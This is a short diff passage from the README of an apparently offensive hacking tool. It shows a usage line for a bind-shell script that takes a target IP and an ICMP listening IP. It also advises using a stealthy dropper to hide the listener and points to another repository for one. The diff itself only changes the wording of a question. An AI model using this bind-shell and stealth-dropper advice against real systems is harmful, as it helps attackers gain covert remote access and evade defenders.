ariary/QueenSono/hack/README.md

 ./bindshell.sh <ip_target> <ip_listening_for_icmp>
 ```

 *Product placement: To be stealthly, you `listener` should use a dropper and hide its presence.
 You could find a stealth dropper example in [curlNExec](https://github.com/ariary/curlNexec) repo.
-Could I adapt it to use ICMP ? 🤔*
+Should I adapt it to use ICMP ? 🤔*